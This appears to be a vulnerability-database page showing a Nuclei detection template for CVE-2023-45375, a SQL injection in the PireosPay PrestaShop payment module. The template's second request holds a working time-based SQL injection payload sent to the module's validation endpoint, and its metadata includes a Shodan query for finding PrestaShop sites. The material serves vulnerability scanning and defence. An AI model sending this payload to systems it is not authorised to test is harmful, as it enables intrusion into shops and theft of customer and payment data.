Lucene search
K

PrestaShop PireosPay - SQL Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

PrestaShop PireosPay SQL Injection - Guest can perform SQL injection in PireosPay module for PrestaShop, version 1.7.9 from 01generator.co

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-45375
17 Oct 202305:15
attackerkb
CNNVD
PrestaShop SQL Injection Vulnerability
17 Oct 202300:00
cnnvd
CVE
CVE-2023-45375
17 Oct 202300:00
cve
Cvelist
CVE-2023-45375
17 Oct 202300:00
cvelist
NVD
CVE-2023-45375
17 Oct 202305:15
nvd
OSV
CVE-2023-45375
17 Oct 202305:15
osv
Prion
Sql injection
17 Oct 202305:15
prion
Positive Technologies
PT-2023-29532 · Pireospay +1 · Pireospay +1
16 Oct 202300:00
ptsecurity
RedhatCVE
CVE-2023-45375
23 May 202503:40
redhatcve
Vulnrichment
CVE-2023-45375
17 Oct 202300:00
vulnrichment
Rows per page
id: CVE-2023-45375
info:
  name: PrestaShop PireosPay - SQL Injection
  author: MaStErChO
  severity: high
  description: |
    In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Authenticated attackers can execute time-based SQL injection through the MerchantReference parameter in the validation endpoint to extract PrestaShop database information including customer and payment data.
  remediation: |
    Update PireosPay module to a version newer than 1.7.9 that properly sanitizes SQL parameters in the validation endpoint.
  reference:
    - https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-45375
    cwe-id: CWE-89
    epss-score: 0.38457
    epss-percentile: 0.98386
    cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 01generator
    product: pireospay
    framework: prestashop
    shodan-query: "http.component:\"prestashop\""
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,pireospay,01generator,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "/modules/pireospay/")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20
        POST /module/pireospay/validation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 302
          - contains(content_type, "text/html")
        condition: and
# digest: 4a0a00473045022027d421550c6c1334107b15ad1f6b7e2f50ce48e7fbbe137a83f750e8556e8517022100ccf9e38603b82602f5d6e4c33f9f2f1ca0a8abf39812bf6714ebdd00e8fae5f8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
EPSS0.38457
SSVC
61